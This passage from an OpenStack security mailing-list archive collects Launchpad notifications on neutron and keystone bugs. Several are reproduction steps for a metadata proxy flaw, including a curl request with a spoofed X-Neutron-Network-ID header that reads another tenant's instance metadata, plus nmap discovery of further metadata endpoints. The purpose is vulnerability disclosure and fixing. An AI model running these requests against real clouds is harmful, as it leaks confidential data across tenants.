optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From fungi at yuggoth.org Fri Feb 28 00:03:59 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 00:03:59 -0000 Subject: [Openstack-security] [Bug 1492398] Re: VXLAN Overlay ping issue when Gateway IP is set to one of local NIC's IP address References: <20150904170107.9123.65334.malonedeb@wampee.canonical.com> Message-ID: <158284824046.19496.8845727908586697446.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - There's an issue when a VXLAN overlay VM tries to ping an overlay IP address that is also the same as one of the host machine's local IP addresses. In my setup, I've tried pinging the overlay VM's router's IP address. Here are the details: VXLAN Id is 100 (this number is immaterial, what matters is that we use VXLAN for tenant traffic) Overlay VM: IP: 10.0.1.3/24 GW: 10.0.1.1 Host Info: enp21s0f0: 1.1.1.5/24 (This interface is used to contact the controller as well as for encapsulated datapath traffic. qbr89a962f7-9b: Linux Bridge to which the Overlay VM connects. No IP address on this one. brctl show: qbr89a962f7-9b 8000.56f6fefb9d5c no qvb89a962f7-9b                                                         tap89a962f7-9b ifconfig qbr89a962f7-9b qbr89a962f7-9b: flags=4163 mtu 1500         inet6 fe80::54f6:feff:fefb:9d5c prefixlen 64 scopeid 0x20         ether 56:f6:fe:fb:9d:5c txqueuelen 0 (Ethernet)         RX packets 916 bytes 27072 (26.4 KiB)         RX errors 0 dropped 0 overruns 0 frame 0         TX packets 10 bytes 780 (780.0 B)         TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 I am using a previously unused NIC named eno1 for this example. When eno1 has no IP address, ping from the overlay VM to the router is successful. ARP on the VM shows the correct MAC resolution. When I set eno1 to 10.0.1.1, ARP on the overlay VM show's qbr89a962f7-9b's MAC address and ping never succeeds. When things work OK ARP for 10.0.1.1 is fa:16:3e:0c:52:6d When eno1 is set to 10.0.1.1 ARP resolution is incorrect, 10.0.1.1 resolves to 56:f6:fe:fb:9d:5c and ping never succeeds. I've deleted ARPs to ensure that resolution is triggered. It appears as of the OVS br-int never received the ARP request. Thanks, -Uday -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1492398 Title: VXLAN Overlay ping issue when Gateway IP is set to one of local NIC's IP address Status in neutron: Expired Status in OpenStack Security Advisory: Won't Fix Bug description: There's an issue when a VXLAN overlay VM tries to ping an overlay IP address that is also the same as one of the host machine's local IP addresses. In my setup, I've tried pinging the overlay VM's router's IP address. Here are the details: VXLAN Id is 100 (this number is immaterial, what matters is that we use VXLAN for tenant traffic) Overlay VM: IP: 10.0.1.3/24 GW: 10.0.1.1 Host Info: enp21s0f0: 1.1.1.5/24 (This interface is used to contact the controller as well as for encapsulated datapath traffic. qbr89a962f7-9b: Linux Bridge to which the Overlay VM connects. No IP address on this one. brctl show: qbr89a962f7-9b 8000.56f6fefb9d5c no qvb89a962f7-9b                                                         tap89a962f7-9b ifconfig qbr89a962f7-9b qbr89a962f7-9b: flags=4163 mtu 1500         inet6 fe80::54f6:feff:fefb:9d5c prefixlen 64 scopeid 0x20         ether 56:f6:fe:fb:9d:5c txqueuelen 0 (Ethernet)         RX packets 916 bytes 27072 (26.4 KiB)         RX errors 0 dropped 0 overruns 0 frame 0         TX packets 10 bytes 780 (780.0 B)         TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 I am using a previously unused NIC named eno1 for this example. When eno1 has no IP address, ping from the overlay VM to the router is successful. ARP on the VM shows the correct MAC resolution. When I set eno1 to 10.0.1.1, ARP on the overlay VM show's qbr89a962f7-9b's MAC address and ping never succeeds. When things work OK ARP for 10.0.1.1 is fa:16:3e:0c:52:6d When eno1 is set to 10.0.1.1 ARP resolution is incorrect, 10.0.1.1 resolves to 56:f6:fe:fb:9d:5c and ping never succeeds. I've deleted ARPs to ensure that resolution is triggered. It appears as of the OVS br-int never received the ARP request. Thanks, -Uday To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1492398/+subscriptions From fungi at yuggoth.org Fri Feb 28 00:02:26 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 00:02:26 -0000 Subject: [Openstack-security] [Bug 1447673] Re: session ID reusable? References: <20150423154006.13687.43783.malonedeb@wampee.canonical.com> Message-ID: <158284814758.19546.12985715331879618218.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added as to the bug as - attachments. - Reported via private E-mail from Anass ANNOUR: I had tested to reply the session ID and the token to a local environnent between to distinct IP, and it worked perfectly. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1447673 Title: session ID reusable? Status in OpenStack Identity (keystone): Expired Status in OpenStack Security Advisory: Won't Fix Bug description: Reported via private E-mail from Anass ANNOUR: I had tested to reply the session ID and the token to a local environnent between to distinct IP, and it worked perfectly. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1447673/+subscriptions From 1824248 at bugs.launchpad.net Fri Feb 28 03:20:53 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 28 Feb 2020 03:20:53 -0000 Subject: [Openstack-security] [Bug 1824248] Related fix merged to neutron-tempest-plugin (master) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158286005370.14436.3588009643282934071.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/681912 Committed: https://git.openstack.org/cgit/openstack/neutron-tempest-plugin/commit/?id=31c0006ded28255e2502d2975648f1fe603ec127 Submitter: Zuul Branch: master commit 31c0006ded28255e2502d2975648f1fe603ec127 Author: Slawek Kaplonski Date: Thu Sep 12 22:11:35 2019 +0200 Add list security group rules API test This test checks that regular user can see all SG rules which belongs to his tenant OR belongs to security group owned by his tenant. This test also ensures that SG rules from different tenants and Security Groups are not visible for regular user. Fix for master branch Depends-On: https://review.opendev.org/681910 Fix for stable/train Depends-On: https://review.opendev.org/688715 Fix for stable/stein Depends-On: https://review.opendev.org/688716 Fix for stable/rocky Depends-On: https://review.opendev.org/688717 Fix for stable/queens Depends-On: https://review.opendev.org/688719 Change-Id: Ic2e97ab8162d10e507ef83b9af0840e7311f0587 Related-Bug: #1824248 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Fri Feb 28 13:59:14 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 13:59:14 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289835446.26517.15637580122096877976.launchpad@gac.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under - embargo. Please do not make any public mention of embargoed - (private) security vulnerabilities before their coordinated - publication by the OpenStack Vulnerability Management Team in the - form of an official OpenStack Security Advisory. This includes - discussion of the bug or associated fixes in public forums such as - mailing lists, code review systems and bug trackers. Please also - avoid private disclosure to other individuals not already approved - for access to this information, and provide this same reminder to - those who are made aware of the issue prior to publication. All - discussion should remain confined to this private bug report, and - any proposed fixes should be added to the bug as attachments. This - embargo shall not extend past 2020-05-27 and will be made - public by or on that date if no fix is identified. - Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 ** Information type changed from Private Security to Public ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:01:04 2020 From: 1865036 at bugs.launchpad.net (Brian Haley) Date: Fri, 28 Feb 2020 14:01:04 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289846466.12728.109765042463052456.malone@soybean.canonical.com> What I was trying to say in my previous comment was that a tenant can't lookup a network ID of another tenant, just their own and any that are shared. Someone with admin creds can lookup all the network IDs. I can send my patch once this is made public, but it will delete the portions of a request that shouldn't be there - if it's expecting a network ID it will delete any router ID header, and vice-versa. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1824248 at bugs.launchpad.net Fri Feb 28 15:29:31 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 28 Feb 2020 15:29:31 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 13.0.7 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158290377161.26762.7877151877205366079.malone@gac.canonical.com> This issue was fixed in the openstack/neutron 13.0.7 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Fri Feb 28 14:02:31 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 14:02:31 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289855119.12393.5945566433888673044.malone@soybean.canonical.com> Switched to public, treating as a class C1 report for now (impractical to exploit, no advisory required, someone might assign a CVE, security note may be warranted) but we can adjust the classification if new information comes to light. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From fungi at yuggoth.org Fri Feb 28 14:07:42 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 14:07:42 -0000 Subject: [Openstack-security] [Bug 1790706] Re: Additional metadata service endpoints on OpenStack accessible References: <153608772235.32124.2296330259413474310.malonedeb@soybean.canonical.com> Message-ID: <158289886301.11782.12602631504560007057.malone@wampee.canonical.com> As this was fixed by the time Stein released, and stable/rocky is entering extended maintenance now, it probably makes no sense to try and issue an advisory (though anyone is welcome to submit a backport to branches under extended maintenance there will be no further point releases tagged for them). ** Description changed: - This issue is being treated as a potential security risk under - embargo. Please do not make any public mention of embargoed - (private) security vulnerabilities before their coordinated - publication by the OpenStack Vulnerability Management Team in the - form of an official OpenStack Security Advisory. This includes - discussion of the bug or associated fixes in public forums such as - mailing lists, code review systems and bug trackers. Please also - avoid private disclosure to other individuals not already approved - for access to this information, and provide this same reminder to - those who are made aware of the issue prior to publication. All - discussion should remain confined to this private bug report, and - any proposed fixes should be added to the bug as attachments. This - embargo shall not extend past 2020-05-27 and will be made - public by or on that date if no fix is identified. - Note: I'm reporting this on behalf of our partner SAP. While the bug is about Newton, one of our neutron developers believes this may still be valid for newer versions: "The bug might be still valid in upstream, since there are no specific case where they are filtering based on the IP 169.254.169.254, since they are passing the same port as such." # Setup: OpenStack Newton with `force_metadata = true` on all network nodes Kubernetes Gardener setup (seed+shoot) on OpenStack # Detail description from the hacker simulation: By running a nmap -sn … scan (ping scan) we discovered several endpoints in the shoot network (apart from the nodes that can be seen from `kubectl --kubeconfig myshoot.kubeconfig get nodes`). We noticed that some of the endpoints also serve meta and user data on port 80, i.e. the metadata service is not only available from the well-known metadata service IP (http://169.254.169.254/…, https://docs.openstack.org/nova/latest/user/metadata-service.html) but also from those other addresses. In our test the endpoints were 10.250.0.2-7. We learned that the endpoints probably are the OpenStack DHCP nodes, i.e. every OpenStack DHCP endpoint appears to also serve the metadata. While the accessibility of the metadata service is a known problem, this situation is “worse” (compared to e.g. Gardener seed and shoot clusters on AWS) for the following reasons: 1. If a network policy is applied to block access from cluster payloads to the metadata service, it’s not enough to block well-known `169.254.169.254` but it must also block all access to all other existing endpoints. How can the definite set of endpoints be determined? Are they guaranteed to not change during the lifetime of a cluster? 2. If the metadata service is only accessible via 169.254.169.254, the known `kubectl proxy` issue (details can be shared if needed) cannot be used to get access to the metadata service, as the link-local 169.254.0.0/16 address range is not allowed by the Kubernetes API server as an endpoint address. But for example 10.250… is allowed, i.e. a shoot user on OpenStack can use the attack to get access to the metadata service in the seed network. The fact that no fix is in sight for the `kubectl proxy` issue and it might not be patchable poses an additional risk regarding 2. We will try to follow up on that with the Kubernetes security team once again. # Detail information: Due to the “force_metadata” setting the DHCP namespaces are exposing the metadata service: # ip netns exec qdhcp-54ad9fe0-2ce5-4083-a32b-ca744e806d1f netstat -tulpen Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 0 1934832519 54198/python tcp 0 0 10.222.0.3:53 0.0.0.0:* LISTEN 0 1934920972 54135/dnsmasq tcp 0 0 169.254.169.254:53 0.0.0.0:* LISTEN 0 1934920970 54135/dnsmasq tcp 0 0 fe80::f816:3eff:fe01:53 :::* LISTEN 198 1934909191 54135/dnsmasq udp 0 0 10.222.0.3:53 0.0.0.0:* 0 1934920971 54135/dnsmasq udp 0 0 169.254.169.254:53 0.0.0.0:* 0 1934920969 54135/dnsmasq udp 0 0 0.0.0.0:67 0.0.0.0:* 0 1934920966 54135/dnsmasq udp 0 0 fe80::f816:3eff:fe01:53 :::* 198 1934909190 54135/dnsmasq The problem is that the metadata proxy is listening to 0.0.0.0:80 instead of 169.254.169.254:80. This let the metadata service respond also to DHCP ip addresses which cannot be blocked easily. This fix mitigated the problem: --- neutron.org/agent/metadata/namespace_proxy.py 2018-08-31 12:42:25.901681939 +0000 +++ neutron/agent/metadata/namespace_proxy.py 2018-08-31 12:43:17.541826180 +0000 @@ -130,7 +130,7 @@              self.router_id)          proxy = wsgi.Server('neutron-network-metadata-proxy',                              num_threads=self.proxy_threads) - proxy.start(handler, self.port) + proxy.start(handler, self.port, '169.254.169.254')          # Drop privileges after port bind          super(ProxyDaemon, self).run() ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1790706 Title: Additional metadata service endpoints on OpenStack accessible Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: Note: I'm reporting this on behalf of our partner SAP. While the bug is about Newton, one of our neutron developers believes this may still be valid for newer versions: "The bug might be still valid in upstream, since there are no specific case where they are filtering based on the IP 169.254.169.254, since they are passing the same port as such." # Setup: OpenStack Newton with `force_metadata = true` on all network nodes Kubernetes Gardener setup (seed+shoot) on OpenStack # Detail description from the hacker simulation: By running a nmap -sn … scan (ping scan) we discovered several endpoints in the shoot network (apart from the nodes that can be seen from `kubectl --kubeconfig myshoot.kubeconfig get nodes`). We noticed that some of the endpoints also serve meta and user data on port 80, i.e. the metadata service is not only available from the well-known metadata service IP (http://169.254.169.254/…, https://docs.openstack.org/nova/latest/user/metadata-service.html) but also from those other addresses. In our test the endpoints were 10.250.0.2-7. We learned that the endpoints probably are the OpenStack DHCP nodes, i.e. every OpenStack DHCP endpoint appears to also serve the metadata. While the accessibility of the metadata service is a known problem, this situation is “worse” (compared to e.g. Gardener seed and shoot clusters on AWS) for the following reasons: 1. If a network policy is applied to block access from cluster payloads to the metadata service, it’s not enough to block well-known `169.254.169.254` but it must also block all access to all other existing endpoints. How can the definite set of endpoints be determined? Are they guaranteed to not change during the lifetime of a cluster? 2. If the metadata service is only accessible via 169.254.169.254, the known `kubectl proxy` issue (details can be shared if needed) cannot be used to get access to the metadata service, as the link-local 169.254.0.0/16 address range is not allowed by the Kubernetes API server as an endpoint address. But for example 10.250… is allowed, i.e. a shoot user on OpenStack can use the attack to get access to the metadata service in the seed network. The fact that no fix is in sight for the `kubectl proxy` issue and it might not be patchable poses an additional risk regarding 2. We will try to follow up on that with the Kubernetes security team once again. # Detail information: Due to the “force_metadata” setting the DHCP namespaces are exposing the metadata service: # ip netns exec qdhcp-54ad9fe0-2ce5-4083-a32b-ca744e806d1f netstat -tulpen Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 0 1934832519 54198/python tcp 0 0 10.222.0.3:53 0.0.0.0:* LISTEN 0 1934920972 54135/dnsmasq tcp 0 0 169.254.169.254:53 0.0.0.0:* LISTEN 0 1934920970 54135/dnsmasq tcp 0 0 fe80::f816:3eff:fe01:53 :::* LISTEN 198 1934909191 54135/dnsmasq udp 0 0 10.222.0.3:53 0.0.0.0:* 0 1934920971 54135/dnsmasq udp 0 0 169.254.169.254:53 0.0.0.0:* 0 1934920969 54135/dnsmasq udp 0 0 0.0.0.0:67 0.0.0.0:* 0 1934920966 54135/dnsmasq udp 0 0 fe80::f816:3eff:fe01:53 :::* 198 1934909190 54135/dnsmasq The problem is that the metadata proxy is listening to 0.0.0.0:80 instead of 169.254.169.254:80. This let the metadata service respond also to DHCP ip addresses which cannot be blocked easily. This fix mitigated the problem: --- neutron.org/agent/metadata/namespace_proxy.py 2018-08-31 12:42:25.901681939 +0000 +++ neutron/agent/metadata/namespace_proxy.py 2018-08-31 12:43:17.541826180 +0000 @@ -130,7 +130,7 @@              self.router_id)          proxy = wsgi.Server('neutron-network-metadata-proxy',                              num_threads=self.proxy_threads) - proxy.start(handler, self.port) + proxy.start(handler, self.port, '169.254.169.254')          # Drop privileges after port bind          super(ProxyDaemon, self).run() To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1790706/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:12:58 2020 From: 1865036 at bugs.launchpad.net (Daniel Alvarez) Date: Fri, 28 Feb 2020 14:12:58 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289917906.12734.14510163631525171316.malone@wampee.canonical.com> I think this won't apply to ML2/OVN as metadata is always fetched via static route to the metadata port and not through a router, so that traffic will never exit the logical switch (Neutron network) to another metadata proxy. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up 